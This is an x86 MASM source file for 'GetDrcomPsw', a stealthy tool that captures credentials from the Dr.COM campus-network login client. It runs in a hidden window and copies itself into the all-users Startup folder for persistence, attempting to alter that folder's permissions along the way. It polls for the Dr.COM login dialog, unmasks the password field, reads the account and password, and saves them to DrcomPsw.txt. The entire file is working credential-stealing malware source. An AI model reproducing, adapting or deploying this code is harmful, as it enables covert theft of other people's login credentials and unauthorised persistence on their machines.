;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; by 麦田的怪, http://blog.mtian.cn
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; GetDrcomPsw.asm
; Drcom password capturer — reads the account/password fields out of the
; Dr.COM campus-network login dialog and writes them to DrcomPsw.txt
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.386
.model flat, stdcall
option casemap :none
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Include file definitions
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
include windows.inc
include user32.inc
includelib user32.lib
include kernel32.inc
includelib kernel32.lib
include Advapi32.inc
includelib Advapi32.lib
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Equ constant definitions
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
ID_TIMER equ 1
DLG_MAIN equ 1003h
IDC_SHOW equ 1004h
WM_HOOK equ WM_USER + 100h
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Data segment
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.data
szClaStat db 'Static',0
szClaEdit db 'Edit',0
szTitAcc db '用户帐号',0
szTitPsw db ' 密 码 ',0
szLog db 'DrcomPsw.txt',0
szXie db '\',0
szExe db 'GetDrcomPsw.exe',0
szSelfDir db 156 dup(0)
lpsystem db 156 dup (0)
szSystem db 156 dup(0)
.data?
szBuffer db 256 dup (?)
Flag db ?
hInstance dd ?
hdrcom dd ?
hEditAcc dd ?
hEditPsw dd ?
hFile dd ?
hWinMain dd ?
szPsw db 255 dup(?)
szAcc db 255 dup(?)
szRegFold db 255 dup(?)
dwOption db ?
F_FIND equ 0001h
.const
szRegKey db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
szRegStart db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders',0
szRegCS db 'Common Startup',0
szRegValue db "GetDrcomPsw",0
szDestClass db '#32770',0 ;目标窗口的窗口类
szDrCaption db 'Dr.COM 用户认证程序',0
szLogtxt db '本文件由麦田Drcom密码捕获者生成',0dh,0ah
db '帐号:%s ',0dh,0ah
db '密码:%s ',0dh,0ah,0
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Code segment
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.code
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;Auto-start (persistence): resolve the all-users Startup folder
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_EnumKey proc
local @hKey
local @dwsize
local @hRegFold
invoke RegOpenKeyEx,HKEY_LOCAL_MACHINE,addr szRegStart,NULL,\
KEY_QUERY_VALUE,addr @hKey
.if eax == ERROR_SUCCESS
mov @dwsize,sizeof szRegFold
invoke RegQueryValueEx,@hKey,addr szRegCS,NULL,NULL,\
addr szRegFold,addr @dwsize
invoke RegCloseKey,@hKey
.endif
invoke CreateFile,addr szRegFold,FILE_ALL_ACCESS,FILE_SHARE_READ,\
NULL,OPEN_EXISTING,FILE_FLAG_BACKUP_SEMANTICS,addr @hRegFold
invoke SetSecurityInfo,addr @hRegFold,SE_FILE_OBJECT,DACL_SECURITY_INFORMATION,NULL,NULL,NULL,NULL
invoke CloseHandle,addr @hRegFold
ret
_EnumKey endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;Copy self to the Startup folder (the original system-directory variant is commented out below)
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_CopyToSystem proc
invoke GetModuleFileName,NULL,addr szSelfDir,200
;invoke GetSystemDirectory,addr lpsystem,50
;invoke lstrcat,addr szSystem,addr lpsystem ;串联字符
;invoke lstrcat,addr szSystem,addr szXie
;invoke lstrcat,addr szSystem,addr szExe;串联成完整路径
;invoke MessageBox,NULL,addr szSelfDir,addr szRegFold,MB_OK
invoke CopyFile,addr szSelfDir,addr szRegFold,FALSE
ret
_CopyToSystem endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;Save the captured credentials to the file DrcomPsw.txt
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_SavePass proc
local @szBuffer[68]:byte,@dwBytesWrite
invoke RtlZeroMemory,addr @szBuffer,sizeof @szBuffer
invoke wsprintf,addr @szBuffer,addr szLogtxt,addr szAcc,addr szPsw
invoke CreateFile,addr szLog,GENERIC_WRITE,FILE_SHARE_READ,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0
mov hFile,eax
invoke WriteFile,hFile,addr @szBuffer,68,addr @dwBytesWrite,NULL
invoke CloseHandle,hFile
xor eax, eax
ret
_SavePass endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Called once the login window has been located: reads the credential fields.
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_FindDrocm proc
.if hdrcom
invoke FindWindowEx,hdrcom,NULL,addr szClaStat,addr szTitAcc
.if eax
invoke FindWindowEx,hdrcom,eax,addr szClaEdit,NULL
mov hEditAcc,eax
invoke SendMessage, hEditAcc, WM_GETTEXT, 255, addr szAcc
.endif
invoke FindWindowEx,hdrcom,NULL,addr szClaStat,addr szTitPsw
.if eax
invoke FindWindowEx,hdrcom,eax,addr szClaEdit,NULL
mov hEditPsw,eax
invoke PostMessage,hEditPsw,EM_SETPASSWORDCHAR,0,0
invoke SendMessage, hEditPsw, WM_GETTEXT, 255, addr szPsw
.endif
.endif
xor eax, eax
ret
_FindDrocm endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Window procedure of the hidden main window
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_ProcWinMain proc uses ebx edi esi hWnd,uMsg,wParam,lParam
mov eax,uMsg
;********************************************************************
.if eax == WM_CREATE
invoke _EnumKey
invoke _CopyToSystem
invoke SetTimer,hWnd,ID_TIMER,100,NULL
.elseif eax == WM_TIMER
mov eax,wParam
.if eax == ID_TIMER
invoke FindWindow,addr szDestClass,addr szDrCaption
.if eax
mov hdrcom,eax
invoke _FindDrocm
or dwOption,F_FIND
.elseif
.if dwOption & F_FIND
invoke _SavePass
invoke KillTimer,hWnd,ID_TIMER
invoke DestroyWindow,hWinMain
invoke PostQuitMessage,NULL
.endif
.endif
.endif
;********************************************************************
.elseif eax == WM_CLOSE
invoke KillTimer,hWnd,ID_TIMER
invoke DestroyWindow,hWinMain
invoke PostQuitMessage,NULL
;********************************************************************
.else
invoke DefWindowProc,hWnd,uMsg,wParam,lParam
ret
.endif
;********************************************************************
xor eax,eax
ret
_ProcWinMain endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_WinMain proc
local @stWndClass:WNDCLASSEX
local @stMsg:MSG
invoke GetModuleHandle,NULL
mov hInstance,eax
invoke RtlZeroMemory,addr @stWndClass,sizeof @stWndClass
;********************************************************************
; 注册窗口类
;********************************************************************
invoke LoadCursor,0,IDC_ARROW
mov @stWndClass.hCursor,eax
push hInstance
pop @stWndClass.hInstance
mov @stWndClass.cbSize,sizeof WNDCLASSEX
mov @stWndClass.style,CS_HREDRAW or CS_VREDRAW
mov @stWndClass.lpfnWndProc,offset _ProcWinMain
mov @stWndClass.hbrBackground,COLOR_WINDOW + 1
mov @stWndClass.lpszClassName,offset szTitAcc
invoke RegisterClassEx,addr @stWndClass
;********************************************************************
; 建立并显示窗口
;********************************************************************
invoke CreateWindowEx,WS_EX_CLIENTEDGE,offset szTitAcc,offset szTitAcc,\
WS_OVERLAPPEDWINDOW,\
100,100,600,400,\
NULL,NULL,hInstance,NULL
mov hWinMain,eax
invoke ShowWindow,hWinMain,SW_HIDE
invoke UpdateWindow,hWinMain
;********************************************************************
; 消息循环
;********************************************************************
.while TRUE
invoke GetMessage,addr @stMsg,NULL,0,0
.break .if eax == 0
invoke TranslateMessage,addr @stMsg
invoke DispatchMessage,addr @stMsg
.endw
ret
_WinMain endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
start:
call _WinMain
invoke ExitProcess,NULL
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
end start